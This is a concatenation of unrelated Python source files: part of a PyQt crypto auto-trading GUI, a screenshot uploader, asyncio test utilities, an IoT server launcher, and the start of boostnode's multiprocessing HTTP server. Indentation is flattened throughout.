item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
row = self.buyTable.rowCount()
self.buyTable.insertRow(row)  # a row must exist before setItem can populate it
self.buyTable.setItem(row, 0, item)
self.buyTable.setItem(row, 1, QTableWidgetItem(cur_time))
# print(' buy_trade_volume_increase END ', datetime.datetime.now())
# Select markets falling from their 24-hour high
def sell_high_coin(self):
# print(time.strftime('%Y%m%d %H%M%s'), ' : sell_high_coin start')
# Find sell targets by trading volume
sell_target = quotation_func.find_sell_high_target()
# print(sell_target)
# Markets to keep holding
favor_market = []
for row in range(0, self.favorMarketTable.rowCount()):
favor_market.append(self.favorMarketTable.item(row, 0).text())
cur_time = datetime.datetime.now().strftime('%Y%m%d %H:%M:%S')
if len(sell_target) > 0:
print(cur_time, ' : sell_target all : ', sell_target)
# Place orders for the found targets
for market in sell_target:
if market not in favor_market:
# self.sell_coin(market, 'ask', 0, 0, 0)
item = QTableWidgetItem(market)
item.setTextAlignment(Qt.AlignVCenter | Qt.AlignRight)
row = self.sellTable.rowCount()
self.sellTable.insertRow(row)  # a row must exist before setItem can populate it
self.sellTable.setItem(row, 0, item)
self.sellTable.setItem(row, 1, QTableWidgetItem(cur_time))
time.sleep(0.5)
def watch_market(self):
# print('monitor : ', self.watch_market_list)
for market in self.watch_market_list:
if market == 'KRW-BTC':
quotation_func.watching_market(market, 0.003, 0.01)
elif market == 'KRW-ETC':
quotation_func.watching_market(market, 0.006, 0.02)
else:
quotation_func.watching_market(market, 0.01, 0.03)
time.sleep(0.5)
def do_time_schedule(self):
# print(' do_time_schedule START ')
self.search_today_ticker()
self.search_account()
cur_datetime = datetime.datetime.now()
cur_weekday = cur_datetime.weekday()
cur_time = cur_datetime.strftime('%H:%M')
cur_minute = cur_datetime.strftime('%M')
if cur_weekday == 6 and cur_time <= '08:30':
print('Taking Sunday morning off')
pass
elif cur_weekday == 5 and cur_time == '11:55':
print('Sunday morning rest: selling everything')
self.sell_all_coin()
elif cur_time == '08:58':
self.kimchi_time = True
print('Time : ', cur_time)
self.sell_all_coin()
self.buy_kimchi_coin()
elif cur_time == '09:10':
print('Cleaning up kimchi coins')
self.sell_kimchi_coin()
self.kimchi_time = False
# elif cur_minute in ('15', '35'):
#
# self.kimchi_time = True
# print('Time 2: ', cur_time)
# self.sell_all_coin()
# self.buy_kimchi_coin()
#
# elif cur_minute in ('25', '45'):
#
# print('Kimchi coin cleanup 2')
# self.sell_kimchi_coin()
# self.kimchi_time = False
elif self.chbAutoTrade.isChecked():
if self.kimchi_time:
print(' Resting during kimchi time ')
else:
# self.trade_coin()
# Find buy targets 1
p_buy1 = mp.Process(name='trade_by_volume', target=self.buy_trade_volume_increase)
p_buy1.start()
# self.buy_trade_volume_increase()
# Find sell targets 1
p_sell1 = mp.Process(name='sell_high_coin', target=self.sell_high_coin)
p_sell1.start()
# self.sell_high_coin()
# Watch the market
p_watch1 = mp.Process(name='watch_market', target=self.watch_market)
p_watch1.start()
# TODO
# Fetch rankings from CoinMarketCap; binance may also provide them
# Add an API access key
def update_config_market(self, cmd, market_kind, market):
config_file = configparser.ConfigParser()
if config_file.read(config.ini_file_name, encoding='utf-8'):
print('exists')
else:
print('not exists')
if not config_file.has_section('MARKET'):
config_file.add_section('MARKET')
if cmd == 'I':
# print(config_file['MARKET'][market_kind])
if config_file.has_option('MARKET', market_kind):
config_file['MARKET'][market_kind] = config_file['MARKET'][market_kind] + ',' + market
# print('a : ', config_file['MARKET'][market_kind])
else:
config_file['MARKET'][market_kind] = market
with open(config.ini_file_name, 'w', encoding='utf-8') as configfile:
config_file.write(configfile)
elif cmd == 'D':
if config_file.has_option('MARKET', market_kind):
# Remove the entry from the comma-separated list (also works for the last item)
market_list = config_file['MARKET'][market_kind].split(',')
if market in market_list:
market_list.remove(market)
config_file['MARKET'][market_kind] = ','.join(market_list)
with open(config.ini_file_name, 'w', encoding='utf-8') as configfile:
config_file.write(configfile)
return True
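# Example (hypothetical values): update_config_market('I', 'FAVOR', 'KRW-BTC')
# appends ",KRW-BTC" to MARKET/FAVOR (or creates the option), while
# update_config_market('D', 'FAVOR', 'KRW-BTC') cuts that entry out of the
# comma-separated list and rewrites the ini file.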
if __name__ == '__main__':
mp.freeze_support()
app = QApplication(sys.argv)
window = MyWindow()
window.setGeometry(10, 10, 1200, 800)
# window.show()
window.showFullScreen()
sys.exit(app.exec_())
|
lm_upload.py
|
# -*- coding: utf-8 -*-
import os
import threading
from lm.lm_api import LMApi
class LMUpload(object):
def __init__(self, files, log_path):
self.files = files
self.log_path = log_path
self.api = LMApi()
def set_upload(self, task_image_path):
threads = []
for file in self.files:
if file.endswith(".png"):
uuid = file[:-4]
thread = threading.Thread(target=self.upload, args=(task_image_path, uuid, file))
threads.append(thread)
else:
os.remove(os.path.join(task_image_path, file))
else:
for t in threads:
t.start()
for t in threads:
t.join()
def upload(self, task_image_path, uuid, file):
try:
self.api.upload_screen_shot(task_image_path, uuid, self.log_path)
os.remove(os.path.join(task_image_path, file))
except Exception:
# Ignore upload failures so one broken screenshot does not stop the rest
pass
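# Usage sketch (illustrative; the directory layout is an assumption):
# uploader = LMUpload(os.listdir(task_image_path), log_path)
# uploader.set_upload(task_image_path)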
|
test_utils.py
|
"""Utilities shared by tests."""
import collections
import contextlib
import io
import logging
import os
import re
import socket
import socketserver
import sys
import tempfile
import threading
import time
import unittest
import weakref
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import base_events
from . import compat
from . import events
from . import futures
from . import selectors
from . import tasks
from .coroutines import coroutine
from .log import logger
from test import support
if sys.platform == 'win32': # pragma: no cover
from .windows_utils import socketpair
else:
from socket import socketpair # pragma: no cover
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(os.__file__), 'test', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_SSLv23)
def run_briefly(loop):
@coroutine
def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
keyfile = ONLYKEY
certfile = ONLYCERT
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(
target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(address=path, use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(address=(host, port), use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer)
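# Usage sketch (illustrative): both helpers are context managers, e.g.
# with run_test_server(use_ssl=False) as httpd:
#     ...  # connect a client to httpd.address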
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages its own time directly.
If something is scheduled to run later, then on the next loop
iteration, after all ready handlers are done, the generator passed
to __init__ is called.
The generator should look like this:
def gen():
...
when = yield ...
... = yield time_advance
The value returned by yield is the absolute time of the next scheduled handler.
The value passed to yield is the time advance used to move the loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError(f'fd {fd} is not registered')
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError(
f'unexpected callback: {handle._callback} != {callback}')
if handle._args != args:
raise AssertionError(
f'unexpected callback args: {handle._args} != {args}')
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError(f'fd {fd} is registered')
def _add_writer(self, fd, callback, *args):
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(
handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(
handle._args, args)
def _ensure_fd_no_transport(self, fd):
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(
fd, transport))
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args):
self._timers.append(when)
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
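# Illustrative sketch (not part of the original module) of the time-generator
# protocol described in the TestLoop docstring above:
#
# def gen():
#     when = yield          # receives the absolute time of the next timer
#     yield when            # advance the virtual clock up to that timer
#
# loop = TestLoop(gen)
# loop.call_at(0.1, callback)   # 'callback' is a placeholder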
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
def get_function_source(func):
source = events._get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def unpatch_get_running_loop(self):
events._get_running_loop = self._get_running_loop
def setUp(self):
self._get_running_loop = events._get_running_loop
events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
self.unpatch_get_running_loop()
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
if not compat.PY34:
# Python 3.3 compatibility
def subTest(self, *args, **kwargs):
class EmptyCM:
def __enter__(self):
pass
def __exit__(self, *exc):
pass
return EmptyCM()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL+1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM,
family=socket.AF_INET):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available',
return_value=False)
|
app.py
|
import asyncio
from threading import Thread
import sys, os, time
from sensor_program import coap_server
from gateway_program.client import gateway_client
from gateway_program.broker import mqtt_broker
from user_interface_program.client import mqtt_client
from user_interface_program.front_end import flask_server
def main():
# Servers
Thread(target=coap_server.run_server).start()
Thread(target=mqtt_broker.run_server).start()
Thread(target=flask_server.run_server).start()
# Start clients
Thread(target=gateway_client.run_client).start()
Thread(target=mqtt_client.run_client).start()
# Wait for keyboard interrupt to kill all threads
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
os._exit(0)
if __name__ == "__main__":
main()
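# Note: the threads started in main() are not daemonized, so os._exit(0) is
# used to terminate the whole process (and all threads) on KeyboardInterrupt.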
|
server.py
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# region header
'''Provides server and request handler classes.'''
# # python3.5
# # pass
from __future__ import absolute_import, division, print_function, \
unicode_literals
# #
'''
For conventions see "boostnode/__init__.py" on \
https://github.com/thaibault/boostnode
'''
__author__ = 'Torben Sickert'
__copyright__ = 'see boostnode/__init__.py'
__credits__ = 'Torben Sickert',
__license__ = 'see boostnode/__init__.py'
__maintainer__ = 'Torben Sickert'
__maintainer_email__ = 'info["~at~"]torben.website'
__status__ = 'stable'
__version__ = '1.0'
from base64 import b64encode as base64_encode
from base64 import b64decode as base64_decode
# # python3.5
# # import builtins
import __builtin__ as builtins
import BaseHTTPServer as server
import CGIHTTPServer as cgi_http_server
# #
import cgi
# # python3.5
# # from collections import Iterable as NativeIterable
# # from copy import copy, deepcopy
# # from http import server
# # import imp
import Cookie as cookies
from copy import copy, deepcopy
# #
import gzip
# # python3.5 from http import cookies
pass
import inspect
# # python3.5
# # import _io
# # import io
pass
# #
import json
import logging
import multiprocessing
import os
import posixpath
# # python3.5 import socketserver
pass
import ssl
import re as regularExpression
import signal
import socket
import subprocess
import sys
# # python3.5
# # pass
import SocketServer
import StringIO
# #
import threading
import time
# # python3.5
# # from types import FunctionType as Function
# # from types import ModuleType
# # from urllib.parse import urlparse as parse_url
# # from urllib.parse import parse_qs as parse_url_query
# # from urllib.parse import unquote as unquote_url
import urllib
from urlparse import urlparse as parse_url
from urlparse import parse_qs as parse_url_query
from urlparse import unquote as unquote_url
# #
'''Make boostnode packages and modules importable via relative paths.'''
sys.path.append(os.path.abspath(sys.path[0] + 2 * (os.sep + '..')))
# # python3.5
# # from boostnode import ENCODING
from boostnode import ENCODING, convert_to_string, convert_to_unicode
# #
from boostnode.extension.file import Handler as FileHandler
from boostnode.extension.native import Iterable, Dictionary, Module, Object, \
InstancePropertyInitializer, String
from boostnode.extension.output import Buffer, Print
from boostnode.extension.output import SET_ATTRIBUTE_MODE as \
SET_OUTPUT_ATTRIBUTE_MODE
from boostnode.extension.output import RESET_ATTRIBUTE_MODE as \
RESET_OUTPUT_ATTRIBUTE_MODE
from boostnode.extension.output import COLOR as OUTPUT_COLOR
from boostnode.extension.system import CommandLine, Platform, Runnable
# # python3.5 from boostnode.extension.type import Self
pass
from boostnode.paradigm.aspectOrientation import JointPoint
from boostnode.paradigm.objectOrientation import Class
# endregion
# TODO check branches.
# region classes
# # python3.5
# # pass
class SocketFileObjectWrapper(socket._fileobject):
'''
This class wraps the native implementation of the server socket. \
The main goal is that the first line from the given socket has to be \
read twice. This curious feature is the only way to get the \
requested file as early as needed to decide if we are able to \
spawn a new process for better load balancing.
'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
def __init__(self, *arguments, **keywords):
'''
This method wraps the initializer to make the first read \
line variable instance bound.
'''
# # # region properties
'''Indicates and saves the first line read of the socket.'''
self.first_read_line = False
# # # endregion
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
# # endregion
@JointPoint
def readline(self, *arguments, **keywords):
'''Wraps the "readline()" method to get the first line twice.'''
if self.first_read_line is False:
try:
'''Take this method via introspection.'''
self.first_read_line = builtins.getattr(
builtins.super(self.__class__, self),
inspect.stack()[0][3]
)(*arguments, **keywords)
return self.first_read_line
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
return ''
elif self.first_read_line is True:
try:
'''Take this method via introspection.'''
return builtins.getattr(
builtins.super(self.__class__, self),
inspect.stack()[0][3]
)(*arguments, **keywords)
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
return ''
result = self.first_read_line
self.first_read_line = True
return result
# endregion
# endregion
# #
# # python3.5
# # class MultiProcessingHTTPServer(
# # socketserver.ThreadingMixIn, server.HTTPServer
# # ):
class MultiProcessingHTTPServer(
SocketServer.ThreadingMixIn, server.HTTPServer, builtins.object
):
# #
'''The Class implements a partial multiprocessing supported web server.'''
# region dynamic methods
# # region public
# # # region special
@JointPoint
# # python3.5
# # def __init__(
# # self: Self, *arguments: builtins.object,
# # **keywords: builtins.object
# # ) -> None:
def __init__(self, *arguments, **keywords):
# #
'''
This initializer wrapper makes sure that the special wrapped file \
socket is instance bound.
'''
# # # region properties
'''
This attribute saves the modified read file socket to apply it in \
the request handler.
'''
self.read_file_socket = None
# # # endregion
'''Take this method via introspection.'''
if not __test_mode__:
return builtins.getattr(
builtins.super(self.__class__, self), inspect.stack()[0][3]
)(*arguments, **keywords)
# # endregion
# endregion
@JointPoint
# # python3.5
# # def is_same_process_request(
# # self: Self, request: socket.socket
# # ) -> builtins.bool:
def is_same_process_request(self, request):
# #
'''
Determines if the given request could be run in its own dedicated \
process.
'''
first_request_line = self.read_file_socket.readline(
Web.MAXIMUM_FIRST_GET_REQUEST_LINE_IN_CHARS
).strip()
# # python3.5
# # if Iterable(self.web.same_process_request_whitelist).is_in_pattern(
# # value=first_request_line.decode()
# # ):
if Iterable(self.web.same_process_request_whitelist).is_in_pattern(
value=first_request_line
):
# #
return True
if self.web.same_process_request_blacklist:
# # python3.5
# # return not Iterable(
# # self.web.same_process_request_blacklist
# # ).is_in_pattern(value=first_request_line.decode())
return not Iterable(
self.web.same_process_request_blacklist
).is_in_pattern(value=first_request_line)
# #
return False
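# The first request line matched against the white/blacklist above looks like
# "GET /path HTTP/1.1" (illustrative), so the request patterns are written
# against the raw request head.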
@JointPoint
# # python3.5
# # def process_request_no_termination_wrapper(
# # self: Self, parent_function: Function,
# # request: socket.socket, arguments: builtins.tuple,
# # keywords: builtins.dict
# # ) -> None:
def process_request_no_termination_wrapper(
self, parent_function, request, arguments, keywords
):
# #
'''
Wraps the normal "process_request" method. To manage the process \
forking stuff.
'''
try:
signal_numbers = Platform.termination_signal_numbers
for signal_number in signal_numbers:
signal.signal(signal_number, signal.SIG_IGN)
parent_function(self, request, *arguments, **keywords)
# # python3.5
# # except(
# # builtins.BrokenPipeError, socket.gaierror,
# # socket.herror, socket.timeout, socket.error
# # ) as exception:
# # __logger__.info(
# # 'Connection interrupted. %s: %s',
# # exception.__class__.__name__, builtins.str(exception))
except(
socket.herror, socket.gaierror, socket.timeout, socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
# #
@JointPoint
# # python3.5
# # def process_request(
# # self: Self, request_socket: socket.socket,
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> None:
def process_request(self, request_socket, *arguments, **keywords):
# #
'''
This method indicates whether the request is read only or not. \
Read only requests will be forked if enough free processors are \
available.
'''
if self.web.block_new_worker:
return None
# # python3.5
# # self.read_file_socket = request_socket.makefile('rb', -1)
# # read_file_socket = self.read_file_socket
# #
# # @JointPoint
# # def readline(
# # *arguments: builtins.object, **keywords: builtins.object
# # ) -> builtins.bytes:
# # '''Wraps the native file object method version.'''
# # self = read_file_socket
# # if not builtins.hasattr(self, 'first_read_line'):
# # self.first_read_line = builtins.getattr(
# # io.BufferedReader, inspect.stack()[0][3]
# # )(self, *arguments, **keywords)
# # return self.first_read_line
# # elif self.first_read_line is True:
# # '''Take this method via introspection.'''
# # return builtins.getattr(
# # io.BufferedReader, inspect.stack()[0][3]
# # )(self, *arguments, **keywords)
# # result = self.first_read_line
# # self.first_read_line = True
# # return result
# # self.read_file_socket.readline = readline
'''
This assignment replaces python's native \
"socket.socket.makefile('rb', -1)" behavior.
'''
self.read_file_socket = SocketFileObjectWrapper(
request_socket, 'rb', -1)
# #
'''NOTE: We have to add 1 for the server processes itself.'''
self.web.number_of_running_processes = \
builtins.len(multiprocessing.active_children()) + 1
'''Determine this method name via introspection.'''
parent_function = builtins.getattr(
server.HTTPServer, inspect.stack()[0][3])
'''
NOTE: "self.is_same_process_request()" has to be called, because \
we expect to read the request head twice from the buffer.
'''
if(not self.is_same_process_request(request_socket) and
self.web.number_of_running_processes <
self.web.maximum_number_of_processes):
self.web.number_of_running_processes += 1
'''Takes this method via introspection from now on.'''
# # python3.5
# # multiprocessing.Process(
# # target=self.process_request_no_termination_wrapper,
# # daemon=True,
# # args=(parent_function, request_socket, arguments, keywords)
# # ).start()
forked_request_process = multiprocessing.Process(
target=self.process_request_no_termination_wrapper,
args=(
parent_function, request_socket, arguments, keywords))
forked_request_process.daemon = True
forked_request_process.start()
# #
else:
try:
# # python3.5
# # return parent_function(
# # self, request_socket, *arguments, **keywords)
# # except(
# # builtins.BrokenPipeError, socket.gaierror, socket.herror,
# # socket.timeout, socket.error
# # ) as exception:
# # __logger__.info(
# # 'Connection interrupted. %s: %s',
# # exception.__class__.__name__, builtins.str(exception))
return parent_function(
self, request_socket, *arguments, **keywords)
except(
socket.herror, socket.gaierror, socket.timeout,
socket.error
) as exception:
__logger__.info(
'Connection interrupted. %s: %s',
exception.__class__.__name__, convert_to_unicode(
exception))
# #
# endregion
class Web(Class, Runnable):
'''
Provides a small platform independent web server designed to easily \
serve a client-server structure.
**root** - Defines the root directory \
to be served via web.
**host_name** - Defines the current host \
name. Necessary for https \
support.
**port** - The port to listen for \
incoming requests. If "0" \
given a free port will be \
determined automatically.
**default** - Defines a default static \
file, python module or \
dynamic executable file.
**key_file** - Key file to support a https \
connection.
**stop_order** - Standard in command to stop \
server.
**encoding** - Encoding to use for \
incoming requests and \
outgoing data.
**request_whitelist** - A whitelist for requests. \
All requests which doesn't \
match to one of these will \
be answered with an 404 \
error code.
**request_blacklist** - A blacklist for requests to \
answer with a 404 error code.
**same_process_request_whitelist** - Requests which match one \
of these patterns \
should be run in the same \
process as the server \
itself. This is usually \
necessary if you plan to \
write to inter-thread \
shared data.
**same_process_request_blacklist** - Requests which match one \
of these patterns \
could be run in different \
processes than the server \
itself. This is usually \
possible if you do not plan to \
write to inter-thread \
shared data.
**static_mime_type_pattern** - Defines which mime types \
should be interpreted as \
static.
**dynamic_mime_type_pattern** - Defines which mime types \
should be interpreted as \
dynamic.
**compressible_mime_type_pattern** - Defines which mime types \
could be returned in a \
compressed way.
**default_file_name_pattern** - Defines file name pattern \
which should be returned \
if no explicit file was \
requested.
**default_module_names** - Defines which module names \
should be ran if no \
explicit module was \
requested.
**authentication** - Enables basic http \
authentication.
**authentication_file_name** - Defines file names for \
saving login data.
**authentication_file_content_pattern** - Defines how to parse \
authentication files.
**authentication_handler** - A boolean function which \
decides by given request \
string and password if \
requested user is \
authenticated.
**module_loading** - Enables or disables running \
python modules which are \
requested.
**maximum_number_of_processes** - Maximum number of used \
processor cores to use. if \
"0" is provided a useful \
number will be determined.
**shared_data** - Data which will be \
available in every request \
handler instance and \
accessible for every common \
gateway interface script.
**request_parameter_delimiter** - Delimiter to distinguish \
requested file from given \
parameter.
**file_size_stream_threshold_in_byte** - Threshold which will force \
the server to stream data.
**directory_listing** - Indicates whether the \
server generates a \
directory listing for \
requested directories.
**internal_redirects** - A mapping of request url \
patterns to corresponding \
internal version. Regular \
expression replacements are \
supported.
**external_redirects** - A mapping of request url \
patterns to corresponding \
external version. Regular \
expression replacements are \
supported.
Examples:
>>> key_file = FileHandler(
... __test_folder__.path + '_initialize_key_file')
>>> key_file.content = ''
>>> Web(key_file=key_file) # doctest: +ELLIPSIS
Object of "Web" with root path "...", port "0" and stop order ...
>>> Web(
... key_file=__test_folder__.path
... ) # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ServerError: Given public key file path "..." ...
'''
# region properties
COMMAND_LINE_ARGUMENTS = (
{'arguments': ('-r', '--root'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines which path is used as web root (default is '
'current working directory).',
'dest': 'root',
'metavar': 'PATH'}},
{'arguments': ('-H', '--host-name'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines the host to bind the server to. If an empty '
'string (default) is given, the underlying socket will '
'listen on all network interfaces. E.g. a binding to the'
' internal loop device "localhost" will only accept local'
' requests. This makes sense if a local proxy server is '
'configured.',
'dest': 'host_name',
'metavar': 'NAME'}},
{'arguments': ('-p', '--port'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'choices': builtins.range(2 ** 16),
'required': {'execute': '__initializer_default_value__ is None'},
'help': 'Defines the port number to access the web server. If '
'zero given a free port will be determined.',
'dest': 'port',
'metavar': 'NUMBER'}},
{'arguments': ('-d', '--default'),
'specification': {
'action': 'store',
'default': {'execute': '__initializer_default_value__'},
'type': {'execute': 'type(__initializer_default_value__)'},
'required': {'execute': '__initializer_default_value__ is None'},
'help': {
'execute': "'Defines which file or module should be requested"
' if nothing was declared explicitly. It could be '
"""understood as welcome page (default: "%s").'"""
" % __initializer_default_value__.replace('%', "
"'%%')"},
'dest': 'default',
'metavar': 'PATH'}},
{'arguments': ('-u', '--key-file-path'),
'specification': {
'action': 'store',
